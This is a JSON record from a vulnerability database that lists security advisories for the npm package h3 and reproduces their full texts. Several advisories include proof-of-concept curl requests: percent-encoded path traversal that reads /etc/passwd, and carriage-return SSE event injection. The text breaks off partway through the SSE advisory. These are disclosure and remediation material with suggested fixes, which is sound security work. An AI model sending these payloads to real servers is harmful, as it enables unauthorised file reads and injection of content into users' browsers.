{"url":"http://public2.vulnerablecode.io/api/packages/923215?format=json","purl":"pkg:npm/h3@0.7.0","type":"npm","namespace":"","name":"h3","version":"0.7.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.15.9","latest_non_vulnerable_version":"2.0.1-rc.18","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360024?format=json","vulnerability_id":"VCID-4v8a-przf-tqff","summary":"h3: Double Decoding in `serveStatic` Bypasses `resolveDotSegments` Path Traversal Protection via `%252e%252e`\n## Summary\n\nThe `serveStatic` utility in h3 applies a redundant `decodeURI()` call to the request pathname after `H3Event` has already performed percent-decoding with `%25` preservation. This double decoding converts `%252e%252e` into `%2e%2e`, which bypasses `resolveDotSegments()` (since it checks for literal `.` characters, not percent-encoded equivalents). When the resulting asset ID is resolved by URL-based backends (CDN, S3, object storage), `%2e%2e` is interpreted as `..` per the URL Standard, enabling path traversal to read arbitrary files from the backend.\n\n## Details\n\nThe vulnerability is a conflict between two decoding stages:\n\n**Stage 1 — `H3Event` constructor** (`src/event.ts:65-69`):\n\n```typescript\nif (url.pathname.includes(\"%\")) {\n  url.pathname = decodeURI(\n    url.pathname.includes(\"%25\") ? url.pathname.replace(/%25/g, \"%2525\") : url.pathname,\n  );\n}\n```\n\nThis correctly preserves `%25` sequences by escaping them before decoding. A request for `/%252e%252e/etc/passwd` produces `event.url.pathname` = `/%2e%2e/etc/passwd` — the `%25` was preserved so `%252e` became `%2e` (not `.`).\n\n**Stage 2 — `serveStatic`** (`src/utils/static.ts:86-88`):\n\n```typescript\nconst originalId = resolveDotSegments(\n  decodeURI(withLeadingSlash(withoutTrailingSlash(event.url.pathname))),\n);\n```\n\nThis applies a **second** `decodeURI()`, which decodes `%2e` → `.`, producing `/../../../etc/passwd`. However, the decoding happens *inside* the `resolveDotSegments()` call argument — `decodeURI` runs first, then `resolveDotSegments` processes the result.\n\nWait — re-examining the flow more carefully:\n\n1. Input pathname after event.ts: `/%2e%2e/%2e%2e/etc/passwd`\n2. `decodeURI()` in static.ts converts `%2e` → `.`, producing: `/../../../etc/passwd`\n3. `resolveDotSegments(\"/../../../etc/passwd\")` **does** resolve `..` segments, clamping to `/etc/passwd`\n\nThe actual bypass is subtler. `decodeURI()` does **not** decode `%2e` — it only decodes characters that `encodeURI` would encode. Since `.` is never encoded by `encodeURI`, `%2e` is **not** decoded by `decodeURI()`. So the chain is:\n\n1. Request: `/%252e%252e/%252e%252e/etc/passwd`\n2. After event.ts decode: `/%2e%2e/%2e%2e/etc/passwd`\n3. `decodeURI()` in static.ts: `/%2e%2e/%2e%2e/etc/passwd` (unchanged — `decodeURI` doesn't decode `%2e`)\n4. `resolveDotSegments()` fast-returns at line 56 because `%2e` contains no literal `.` character:\n   ```typescript\n   if (!path.includes(\".\")) {\n     return path;\n   }\n   ```\n5. Asset ID `/%2e%2e/%2e%2e/etc/passwd` is passed to `getMeta()` and `getContents()` callbacks\n6. URL-based backends resolve `%2e%2e` as `..` per RFC 3986 / URL Standard\n\nThe root cause is `resolveDotSegments()` only checks for literal `.` characters and does not account for percent-encoded dot sequences (`%2e`). The `decodeURI()` in static.ts is redundant (event.ts already decodes) but is not the direct cause — the real gap is that `%2e%2e` survives as a traversal payload through both decoding stages and `resolveDotSegments`.\n\n## PoC\n\n**1. Create a minimal h3 server with a URL-based static backend:**\n\n```javascript\n// server.mjs\nimport { H3, serveStatic } from \"h3\";\nimport { serve } from \"srvx\";\n\nconst app = new H3();\n\napp.get(\"/**\", (event) => {\n  return serveStatic(event, {\n    getMeta(id) {\n      console.log(\"[getMeta] asset ID:\", id);\n      // Simulate URL-based backend (CDN/S3)\n      const url = new URL(id, \"https://cdn.example.com/static/\");\n      console.log(\"[getMeta] resolved URL:\", url.href);\n      return { type: \"text/plain\" };\n    },\n    getContents(id) {\n      console.log(\"[getContents] asset ID:\", id);\n      const url = new URL(id, \"https://cdn.example.com/static/\");\n      console.log(\"[getContents] resolved URL:\", url.href);\n      return `Fetched from: ${url.href}`;\n    },\n  });\n});\n\nserve({ fetch: app.fetch, port: 3000 });\n```\n\n**2. Send the double-encoded traversal request:**\n\n```bash\ncurl -v 'http://localhost:3000/%252e%252e/%252e%252e/etc/passwd'\n```\n\n**3. Observe server logs:**\n\n```\n[getMeta] asset ID: /%2e%2e/%2e%2e/etc/passwd\n[getMeta] resolved URL: https://cdn.example.com/etc/passwd\n[getContents] asset ID: /%2e%2e/%2e%2e/etc/passwd\n[getContents] resolved URL: https://cdn.example.com/etc/passwd\n```\n\nThe `%2e%2e` sequences in the asset ID are resolved as `..` by the `URL` constructor, causing the backend URL to traverse from `/static/` to `/etc/passwd`.\n\n## Impact\n\n- **Arbitrary file read from backend storage:** An unauthenticated attacker can read files outside the intended static asset directory on any URL-based backend (CDN origins, S3 buckets, object storage, reverse-proxied file servers).\n- **Sensitive data exposure:** Depending on the backend, this could expose configuration files, credentials, source code, or other tenants' data in shared storage.\n- **Affected deployments:** Applications using `serveStatic` with callbacks that resolve asset IDs via URL construction (`new URL(id, baseUrl)` or equivalent). This is a common pattern for CDN proxying and cloud object storage backends. Filesystem-based backends using `path.join()` are not affected since `%2e%2e` is not resolved as a traversal sequence by filesystem APIs.\n\n## Recommended Fix\n\nThe `resolveDotSegments()` function must account for percent-encoded dot sequences. Additionally, the redundant `decodeURI()` in `serveStatic` should be removed since `H3Event` already handles decoding.\n\n**Fix 1 — Remove redundant `decodeURI` in `src/utils/static.ts:86-88`:**\n\n```diff\n  const originalId = resolveDotSegments(\n-   decodeURI(withLeadingSlash(withoutTrailingSlash(event.url.pathname))),\n+   withLeadingSlash(withoutTrailingSlash(event.url.pathname)),\n  );\n```\n\n**Fix 2 — Harden `resolveDotSegments` in `src/utils/internal/path.ts:55-73` to handle percent-encoded dots:**\n\n```diff\n export function resolveDotSegments(path: string): string {\n-  if (!path.includes(\".\")) {\n+  if (!path.includes(\".\") && !path.toLowerCase().includes(\"%2e\")) {\n     return path;\n   }\n   // Normalize backslashes to forward slashes to prevent traversal via `\\`\n-  const segments = path.replaceAll(\"\\\\\", \"/\").split(\"/\");\n+  const segments = path.replaceAll(\"\\\\\", \"/\")\n+    .replaceAll(/%2e/gi, \".\")\n+    .split(\"/\");\n   const resolved: string[] = [];\n```\n\nBoth fixes should be applied. Fix 1 removes the unnecessary double-decode. Fix 2 provides defense-in-depth by ensuring `resolveDotSegments` cannot be bypassed with percent-encoded dots regardless of the caller.","references":[{"reference_url":"https://github.com/h3js/h3","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3"},{"reference_url":"https://github.com/h3js/h3/security/advisories/GHSA-72gr-qfp7-vwhw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3/security/advisories/GHSA-72gr-qfp7-vwhw"},{"reference_url":"https://github.com/advisories/GHSA-72gr-qfp7-vwhw","reference_id":"GHSA-72gr-qfp7-vwhw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-72gr-qfp7-vwhw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374618?format=json","purl":"pkg:npm/h3@1.15.9","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@1.15.9"}],"aliases":["GHSA-72gr-qfp7-vwhw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4v8a-przf-tqff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360011?format=json","vulnerability_id":"VCID-apa8-aqmg-3yft","summary":"h3 has a Path Traversal via Percent-Encoded Dot Segments in serveStatic Allows Arbitrary File Read\n## Summary\n\n`serveStatic()` in h3 is vulnerable to path traversal via percent-encoded dot segments (`%2e%2e`), allowing an unauthenticated attacker to read arbitrary files outside the intended static directory on Node.js deployments.\n\n## Details\n\nThe vulnerability exists in `src/utils/static.ts` at [line 86](https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/static.ts#L86):\n\n```typescript\nconst originalId = decodeURI(withLeadingSlash(withoutTrailingSlash(event.url.pathname)));\n```\n\nOn Node.js, h3 uses srvx's `FastURL` class to parse request URLs. Unlike the standard WHATWG `URL` parser, `FastURL` extracts the pathname via raw string slicing for performance — it does **not** normalize dot segments (`.` / `..`) or resolve percent-encoded equivalents (`%2e`).\n\nThis means a request to `/%2e%2e/` will have `event.url.pathname` return `/%2e%2e/` verbatim, whereas the standard `URL` parser would normalize it to `/` (resolving `..` upward).\n\nThe `serveStatic()` function then calls `decodeURI()` on this raw pathname, which decodes `%2e` to `.`, producing `/../`. The resulting path containing `../` traversal sequences is passed directly to the user-provided `getMeta()` and `getContents()` callbacks with no sanitization or traversal validation.\n\nWhen these callbacks perform filesystem operations (the intended and documented usage), the `../` sequences resolve against the filesystem, escaping the static root directory.\n\n\nBefore exploit:\n\n<img width=\"761\" height=\"97\" alt=\"image\" src=\"https://github.com/user-attachments/assets/798f9d3d-f76c-4c29-aca3-5a6ccd3b3627\" />\n\n### Vulnerability chain\n\n```\n1. Attacker sends:    GET /%2e%2e/%2e%2e/%2e%2e/etc/passwd\n2. FastURL.pathname:  /%2e%2e/%2e%2e/%2e%2e/etc/passwd  (raw, no normalization)\n3. decodeURI():       /../../../etc/passwd                (%2e decoded to .)\n4. getMeta(id):       id = \"/../../../etc/passwd\"         (no traversal check)\n5. path.join(root,id): /etc/passwd                        (.. resolved by OS)\n6. Response:          contents of /etc/passwd\n```\n\n## PoC\n\n### Vulnerable server (`server.ts`)\n\n```typescript\nimport { H3, serveStatic } from \"h3\";\nimport { serve } from \"h3/node\";\nimport { readFileSync, statSync } from \"node:fs\";\nimport { join, resolve } from \"node:path\";\n\nconst STATIC_ROOT = resolve(\"./public\");\nconst app = new H3();\n\napp.all(\"/**\", (event) =>\n  serveStatic(event, {\n    getMeta: (id) => {\n      const filePath = join(STATIC_ROOT, id);\n      try {\n        const stat = statSync(filePath);\n        return { size: stat.size, mtime: stat.mtime };\n      } catch {\n        return undefined;\n      }\n    },\n    getContents: (id) => {\n      const filePath = join(STATIC_ROOT, id);\n      try {\n        return readFileSync(filePath);\n      } catch {\n        return undefined;\n      }\n    },\n  })\n);\n\nserve({ fetch: app.fetch });\n```\n\n### Exploit\n\n```bash\n# Read /etc/passwd (adjust number of %2e%2e segments based on static root depth)\ncurl -s --path-as-is \"http://localhost:3000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n```\n\n### Result\n\n```\nroot:x:0:0:root:/root:/usr/bin/zsh\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n...\n```\n\n\nProof:\n\n<img width=\"940\" height=\"703\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f452e061-847a-424c-9dda-dfbf899687b1\" />\n\nPwned by **0xkakashi** \n\n<img width=\"942\" height=\"74\" alt=\"image\" src=\"https://github.com/user-attachments/assets/db881519-1456-4e4c-a751-d8781b7abe95\" />\n\n\n## Impact\n\nAn unauthenticated remote attacker can read arbitrary files from the server's filesystem by sending a crafted HTTP request with `%2e%2e` (percent-encoded `..`) path segments to any endpoint served by `serveStatic()`.\n\nThis affects any h3 v2.x application using `serveStatic()` running on Node.js (where the `FastURL` fast path is used). Applications running on runtimes that provide a pre-parsed `URL` object (e.g., Cloudflare Workers, Deno) may not be affected, as `FastURL`'s raw string slicing is bypassed.\n\n**Exploitable files include but are not limited to:**\n- `/etc/passwd`, `/etc/shadow` (if readable)\n- Application source code and configuration files\n- `.env` files containing secrets, API keys, database credentials\n- Private keys and certificates","references":[{"reference_url":"https://github.com/h3js/h3","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3"},{"reference_url":"https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/static.ts#L86","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/static.ts#L86"},{"reference_url":"https://github.com/h3js/h3/commit/0e751b4059060f2ade01a0bdfd96b0f5ffc8a26d","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3/commit/0e751b4059060f2ade01a0bdfd96b0f5ffc8a26d"},{"reference_url":"https://github.com/h3js/h3/security/advisories/GHSA-wr4h-v87w-p3r7","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3/security/advisories/GHSA-wr4h-v87w-p3r7"},{"reference_url":"https://github.com/advisories/GHSA-wr4h-v87w-p3r7","reference_id":"GHSA-wr4h-v87w-p3r7","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wr4h-v87w-p3r7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374542?format=json","purl":"pkg:npm/h3@1.15.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4v8a-przf-tqff"},{"vulnerability":"VCID-v8vs-b2fc-kyhw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@1.15.6"},{"url":"http://public2.vulnerablecode.io/api/packages/374541?format=json","purl":"pkg:npm/h3@2.0.1-rc.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2hkd-gg7k-sbet"},{"vulnerability":"VCID-kz7g-hxqt-dkaq"},{"vulnerability":"VCID-v8vs-b2fc-kyhw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@2.0.1-rc.15"}],"aliases":["GHSA-wr4h-v87w-p3r7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-apa8-aqmg-3yft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/78209?format=json","vulnerability_id":"VCID-dm42-ypzp-s7gn","summary":"H3 is a minimal H(TTP) framework. In versions prior to 1.15.6 and between 2.0.0 through 2.0.1-rc.14, createEventStream is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients. This issue is fixed in versions 1.15.6 and 2.0.1-rc.15.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33128","reference_id":"","reference_type":"","scores":[{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07496","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33128"},{"reference_url":"https://github.com/h3js/h3","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33128","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33128"},{"reference_url":"https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6","reference_id":"7791538e15ca22437307c06b78fa155bb73632a6","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T11:36:13Z/"}],"url":"https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6"},{"reference_url":"https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187","reference_id":"event-stream.ts#L170-L187","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T11:36:13Z/"}],"url":"https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187"},{"reference_url":"https://github.com/advisories/GHSA-22cc-p3c6-wpvm","reference_id":"GHSA-22cc-p3c6-wpvm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-22cc-p3c6-wpvm"},{"reference_url":"https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm","reference_id":"GHSA-22cc-p3c6-wpvm","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T11:36:13Z/"}],"url":"https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374542?format=json","purl":"pkg:npm/h3@1.15.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4v8a-przf-tqff"},{"vulnerability":"VCID-v8vs-b2fc-kyhw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@1.15.6"},{"url":"http://public2.vulnerablecode.io/api/packages/374541?format=json","purl":"pkg:npm/h3@2.0.1-rc.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2hkd-gg7k-sbet"},{"vulnerability":"VCID-kz7g-hxqt-dkaq"},{"vulnerability":"VCID-v8vs-b2fc-kyhw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@2.0.1-rc.15"}],"aliases":["CVE-2026-33128","GHSA-22cc-p3c6-wpvm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dm42-ypzp-s7gn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/66790?format=json","vulnerability_id":"VCID-kbcx-q61u-5fd6","summary":"H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for \"chunked\", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23527.json","reference_id":"","reference_type":"","scores":[{"value":"8.9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23527.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23527","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13603","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23527"},{"reference_url":"https://github.com/h3js/h3","reference_id":"","reference_type":"","scores":[{"value":"8.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2430110","reference_id":"2430110","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2430110"},{"reference_url":"https://github.com/h3js/h3/commit/618ccf4f37b8b6148bea7f36040471af45bfb097","reference_id":"618ccf4f37b8b6148bea7f36040471af45bfb097","reference_type":"","scores":[{"value":"8.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-15T19:59:57Z/"}],"url":"https://github.com/h3js/h3/commit/618ccf4f37b8b6148bea7f36040471af45bfb097"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23527","reference_id":"CVE-2026-23527","reference_type":"","scores":[{"value":"8.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23527"},{"reference_url":"https://github.com/advisories/GHSA-mp2g-9vg9-f4cg","reference_id":"GHSA-mp2g-9vg9-f4cg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mp2g-9vg9-f4cg"},{"reference_url":"https://github.com/h3js/h3/security/advisories/GHSA-mp2g-9vg9-f4cg","reference_id":"GHSA-mp2g-9vg9-f4cg","reference_type":"","scores":[{"value":"8.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-15T19:59:57Z/"}],"url":"https://github.com/h3js/h3/security/advisories/GHSA-mp2g-9vg9-f4cg"},{"reference_url":"https://simonkoeck.com/writeups/h3-transfer-encoding-request-smuggling","reference_id":"h3-transfer-encoding-request-smuggling","reference_type":"","scores":[{"value":"8.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-15T19:59:57Z/"}],"url":"https://simonkoeck.com/writeups/h3-transfer-encoding-request-smuggling"},{"reference_url":"https://github.com/h3js/h3/releases/tag/v1.15.5","reference_id":"v1.15.5","reference_type":"","scores":[{"value":"8.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-15T19:59:57Z/"}],"url":"https://github.com/h3js/h3/releases/tag/v1.15.5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/37817?format=json","purl":"pkg:npm/h3@1.15.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4v8a-przf-tqff"},{"vulnerability":"VCID-apa8-aqmg-3yft"},{"vulnerability":"VCID-dm42-ypzp-s7gn"},{"vulnerability":"VCID-v8vs-b2fc-kyhw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@1.15.5"},{"url":"http://public2.vulnerablecode.io/api/packages/923283?format=json","purl":"pkg:npm/h3@2.0.0-beta.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-p5dz-1qr6-73c4"},{"vulnerability":"VCID-v8vs-b2fc-kyhw"},{"vulnerability":"VCID-x9a2-jy5b-53e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@2.0.0-beta.0"}],"aliases":["CVE-2026-23527","GHSA-mp2g-9vg9-f4cg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kbcx-q61u-5fd6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360094?format=json","vulnerability_id":"VCID-v8vs-b2fc-kyhw","summary":"h3: SSE Event Injection via Unsanitized Carriage Return (`\\r`) in EventStream Data and Comment Fields (Bypass of CVE Fix)\n## Summary\n\nThe `EventStream` class in h3 fails to sanitize carriage return (`\\r`) characters in `data` and `comment` fields. Per the SSE specification, `\\r` is a valid line terminator, so browsers interpret injected `\\r` as line breaks. This allows an attacker to inject arbitrary SSE events, spoof event types, and split a single `push()` call into multiple distinct browser-parsed events. This is an incomplete fix bypass of commit `7791538` which addressed `\\n` injection but missed `\\r`-only injection.\n\n## Details\n\nThe prior fix in commit `7791538` added `_sanitizeSingleLine()` to strip `\\n` and `\\r` from `id` and `event` fields, and changed `data` formatting to split on `\\n`. However, two code paths remain vulnerable:\n\n### 1. `data` field — `formatEventStreamMessage()` (`src/utils/internal/event-stream.ts:190-193`)\n\n```typescript\nconst data = typeof message.data === \"string\" ? message.data : \"\";\nfor (const line of data.split(\"\\n\")) {  // Only splits on \\n, not \\r\n  result += `data: ${line}\\n`;\n}\n```\n\n`String.prototype.split(\"\\n\")` does **not** split on `\\r`. A string like `\"legit\\revent: evil\"` remains as a single \"line\" and is emitted as:\n\n```\ndata: legit\\revent: evil\\n\n```\n\nPer the [SSE specification §9.2.6](https://html.spec.whatwg.org/multipage/server-sent-events.html#event-stream-interpretation), `\\r` alone is a valid line terminator. The browser parses this as two separate lines:\n\n```\ndata: legit\nevent: evil\n```\n\n### 2. `comment` field — `formatEventStreamComment()` (`src/utils/internal/event-stream.ts:170-177`)\n\n```typescript\nexport function formatEventStreamComment(comment: string): string {\n  return (\n    comment\n      .split(\"\\n\")  // Only splits on \\n, not \\r\n      .map((l) => `: ${l}\\n`)\n      .join(\"\") + \"\\n\"\n  );\n}\n```\n\nThe same `split(\"\\n\")` pattern means `\\r` in comments is not handled. An input like `\"x\\rdata: injected\"` produces:\n\n```\n: x\\rdata: injected\\n\\n\n```\n\nWhich the browser parses as a comment line followed by actual data:\n\n```\n: x\ndata: injected\n```\n\n### Why `_sanitizeSingleLine` doesn't help\n\nThe `_sanitizeSingleLine` function at line 198 correctly strips both `\\r` and `\\n`:\n\n```typescript\nfunction _sanitizeSingleLine(value: string): string {\n  return value.replace(/[\\n\\r]/g, \"\");\n}\n```\n\nBut it is **only applied to `id` and `event` fields** (lines 182, 185), not to `data` or `comment`.\n\n## PoC\n\n### Setup\n\nCreate a minimal h3 application that reflects user input into an SSE stream:\n\n```javascript\n// server.mjs\nimport { createApp, createEventStream, defineEventHandler, getQuery } from \"h3\";\n\nconst app = createApp();\n\napp.use(\"/sse\", defineEventHandler(async (event) => {\n  const stream = createEventStream(event);\n  const { msg } = getQuery(event);\n\n  // Simulates user-controlled input flowing to SSE (common in chat/AI apps)\n  await stream.push(String(msg));\n\n  setTimeout(() => stream.close(), 1000);\n  return stream.send();\n}));\n\nexport default app;\n```\n\n### Attack 1: Event type injection via `\\r` in data\n\n```bash\n# Inject an \"event: evil\" directive via \\r in data\ncurl -N --no-buffer \"http://localhost:3000/sse?msg=legit%0Devent:%20evil\"\n```\n\n**Expected (safe) wire output:**\n```\ndata: legit\\revent: evil\\n\\n\n```\n\n**Browser parses as:**\n```\ndata: legit\nevent: evil\n```\n\nThe browser's `EventSource` fires a custom `evil` event instead of the default `message` event, potentially routing data to unintended handlers.\n\n### Attack 2: Message boundary injection (event splitting)\n\n```bash\n# Inject a message boundary (\\r\\r = empty line) to split one push() into two events\ncurl -N --no-buffer \"http://localhost:3000/sse?msg=first%0D%0Ddata:%20injected\"\n```\n\n**Browser parses as two separate events:**\n1. Event 1: `data: first`\n2. Event 2: `data: injected`\n\nA single `push()` call produces two distinct events in the browser — the attacker controls the second event's content entirely.\n\n### Attack 3: Comment escape to data injection\n\n```bash\n# Inject 